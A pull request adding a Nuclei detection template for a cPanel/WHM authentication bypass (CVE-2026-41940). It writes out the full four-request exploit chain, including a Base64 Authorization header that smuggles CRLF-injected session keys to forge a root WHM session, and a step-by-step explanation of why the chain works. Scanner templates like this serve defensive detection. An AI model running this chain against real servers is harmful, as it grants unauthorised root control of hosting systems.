### PR TITLE
Add CVE-2026-41940

### DIFF
--- a/http/cves/2026/CVE-2026-41940.yaml
+++ b/http/cves/2026/CVE-2026-41940.yaml
@@ -70,4 +70,4 @@ http:
       - type: regex
         part: body
         regex:
-          - '"version"\s*:\s*"[0-9.]+"'
+          - '^\{"data":\{"version":"[0-9.]+"\},"metadata":\{"reason":"OK","command":"version","version":1,"result":1\}\}$'

--- a/http/cves/2026/CVE-2026-41940.yaml
+++ b/http/cves/2026/CVE-2026-41940.yaml
@@ -8,7 +8,8 @@ info:
     cPanel/WHM is vulnerable to an authentication bypass caused by CRLF injection into session files, allowing an unauthenticated attacker to forge a privileged root session and access WHM as root.
   reference:
     - https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026
-    - https://hadrian.io/blog/cpanel-what-happens-when-94-depends-on-one-vendor
+    - https://hadrian.io/blog/cve-2026-41940-a-critical-authentication-bypass-in-cpanel
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-41940
   metadata:
     verified: true
   tags: cve,cve2026,cpanel,whm,auth-bypass,crlf

--- a/http/cves/2026/CVE-2026-41940.yaml
+++ b/http/cves/2026/CVE-2026-41940.yaml
@@ -14,8 +14,18 @@ info:
     verified: true
   tags: cve,cve2026,cpanel,whm,auth-bypass,crlf
 
+flow: |
+  for (let i = 1; i <= 4; i++) {
+    set("attempt", i);
+    http("login");
+    http("inject");
+    http("regen");
+    if (http("verify")) { break; }
+  }
+
 http:
-  - raw:
+  - id: login
+    raw:
       - |
         POST /login/?login_only=1 HTTP/1.1
         Host: {{Hostname}}
@@ -23,30 +33,7 @@ http:
         Content-Length: 20
 
         user=root&pass=wrong
-      - |
-        GET /?attempt={{attempt}} HTTP/1.1
-        Host: {{Hostname}}
-        Cookie: {{cookie_name}}={{sess_clean}}
-        Authorization: Basic cm9vdDp4DQpoYXNyb290PTENCnRmYV92ZXJpZmllZD0xDQp1c2VyPXJvb3QNCmNwX3NlY3VyaXR5X3Rva2VuPS9jcHNlc3M5OTk5OTk5OTk5DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9MTc3NzQ2MjE0OQ0K
-      # regen trigger: bad token forces do_token_denied -> Modify::new(nocache=>1), promoting CRLF-injected keys into the JSON session cache
-      - |
-        GET /cpsess9999999999/scripts2/listaccts HTTP/1.1
-        Host: {{Hostname}}
-        Cookie: {{cookie_name}}={{sess_clean}}
-      - |
-        GET /cpsess9999999999/json-api/version?api.version=1 HTTP/1.1
-        Host: {{Hostname}}
-        Cookie: {{cookie_name}}={{sess_clean}}
 
-    payloads:
-      attempt:
-        - "1"
-        - "2"
-        - "3"
-        - "4"
-    attack: batteringram
-    iterate-all: true
-    stop-at-first-match: true
     disable-cookie: true
     redirects: false
 
@@ -65,6 +52,38 @@ http:
         group: 1
         regex:
           - "(?:whostmgrsession|cpsession)=([^;,]+?)%2c"
+
+  - id: inject
+    raw:
+      - |
+        GET /?attempt={{attempt}} HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: {{cookie_name}}={{sess_clean}}
+        Authorization: Basic cm9vdDp4DQpoYXNyb290PTENCnRmYV92ZXJpZmllZD0xDQp1c2VyPXJvb3QNCmNwX3NlY3VyaXR5X3Rva2VuPS9jcHNlc3M5OTk5OTk5OTk5DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9MTc3NzQ2MjE0OQ0K
+
+    disable-cookie: true
+    redirects: false
+
+  # regen trigger: bad token forces do_token_denied -> Modify::new(nocache=>1), promoting CRLF-injected keys into the JSON session cache
+  - id: regen
+    raw:
+      - |
+        GET /cpsess9999999999/scripts2/listaccts HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: {{cookie_name}}={{sess_clean}}
+
+    disable-cookie: true
+    redirects: false
+
+  - id: verify
+    raw:
+      - |
+        GET /cpsess9999999999/json-api/version?api.version=1 HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: {{cookie_name}}={{sess_clean}}
+
+    disable-cookie: true
+    redirects: false
 
     matchers-condition: and
     matchers:

--- a/http/cves/2026/CVE-2026-41940.yaml
+++ b/http/cves/2026/CVE-2026-41940.yaml
@@ -1,0 +1,72 @@
+id: CVE-2026-41940
+
+info:
+  name: cPanel/WHM Authentication Bypass via Session-File CRLF Injection (CVE-2026-41940)
+  author: hadrian.io
+  severity: critical
+  description: |
+    cPanel/WHM is vulnerable to an authentication bypass caused by CRLF injection into session files, allowing an unauthenticated attacker to forge a privileged root session and access WHM as root.
+  reference:
+    - https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026
+    - https://hadrian.io/blog/cpanel-what-happens-when-94-depends-on-one-vendor
+  metadata:
+    verified: true
+  tags: cve,cve2026,cpanel,whm,auth-bypass,crlf
+
+http:
+  - raw:
+      - |
+        POST /login/?login_only=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 20
+
+        user=root&pass=wrong
+      - |
+        GET /?attempt={{attempt}} HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: {{cookie_name}}={{sess_clean}}
+        Authorization: Basic cm9vdDp4DQpoYXNyb290PTENCnRmYV92ZXJpZmllZD0xDQp1c2VyPXJvb3QNCmNwX3NlY3VyaXR5X3Rva2VuPS9jcHNlc3M5OTk5OTk5OTk5DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9MTc3NzQ2MjE0OQ0K
+      # regen trigger: bad token forces do_token_denied -> Modify::new(nocache=>1), promoting CRLF-injected keys into the JSON session cache
+      - |
+        GET /cpsess9999999999/scripts2/listaccts HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: {{cookie_name}}={{sess_clean}}
+      - |
+        GET /cpsess9999999999/json-api/version?api.version=1 HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: {{cookie_name}}={{sess_clean}}
+
+    payloads:
+      attempt:
+        - "1"
+        - "2"
+        - "3"
+        - "4"
+    attack: batteringram
+    iterate-all: true
+    stop-at-first-match: true
+    disable-cookie: true
+    redirects: false
+
+    extractors:
+      - type: regex
+        name: cookie_name
+        part: header
+        internal: true
+        group: 1
+        regex:
+          - "(?i)set-cookie:\\s*(whostmgrsession|cpsession)="
+      - type: regex
+        name: sess_clean
+        part: header
+        internal: true
+        group: 1
+        regex:
+          - "(?:whostmgrsession|cpsession)=([^;,]+?)%2c"
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '"version"\s*:\s*"[0-9.]+"'

--- a/http/cves/2026/CVE-2026-41940.yaml
+++ b/http/cves/2026/CVE-2026-41940.yaml
@@ -66,8 +66,16 @@ http:
         regex:
           - "(?:whostmgrsession|cpsession)=([^;,]+?)%2c"
 
+    matchers-condition: and
     matchers:
-      - type: regex
+      - type: status
+        status:
+          - 200
+      - type: word
         part: body
-        regex:
-          - '^\{"data":\{"version":"[0-9.]+"\},"metadata":\{"reason":"OK","command":"version","version":1,"result":1\}\}$'
+        condition: and
+        words:
+          - '"data":{"version":"'
+          - '"command":"version"'
+          - '"reason":"OK"'
+          - '"result":1'


### PR DESCRIPTION
### PR Information
<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->
- Added CVE-2026-41940: cPanel/WHM authentication bypass via session-file CRLF injection (unauth to root-equivalent WHM access)
- References:
  - https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026
  - https://hadrian.io/blog/cve-2026-41940-a-critical-authentication-bypass-in-cpanel

### Template validation
<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->
- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)
<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

The exploit chains four requests:

1. `POST /login/?login_only=1` with bad credentials mints a pre-auth session file and returns a `whostmgrsession` / `cpsession` cookie.
2. `GET /` with the cookie (suffix stripped) and an `Authorization: Basic <b64>` header whose decoded value contains CRLF sequences. `saveSession()` writes the password verbatim, appending forged `hasroot=1`, `tfa_verified=1`, `user=root`, `cp_security_token=/cpsess9999999999`, and `successful_internal_auth_with_timestamp=...` lines to the raw session file.
3. `GET /cpsess9999999999/scripts2/listaccts`: the chosen `cpsess` token does not match the issued one, so `do_token_denied()` calls `Modify::new(nocache => 1)`, re-parsing the multi-line raw file and rewriting the JSON cache with the injected keys promoted to top-level session entries.
4. `GET /cpsess9999999999/json-api/version?api.version=1` passes the URL-token check, `tfa_verified=1` skips 2FA, the recent-auth timestamp skips the password challenge, and `cpsrvd` returns the version JSON, executed as root.

`Modify::save()` serialises the session hash with Perl's randomised hash-key order, so the injected `cp_security_token` is occasionally overwritten by the original empty value. The template uses a 4-iteration battering-ram loop to make the chain reliable. `disable-cookie: true` is required so the forged session cookie is reused verbatim across steps.

### Additional References:
- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)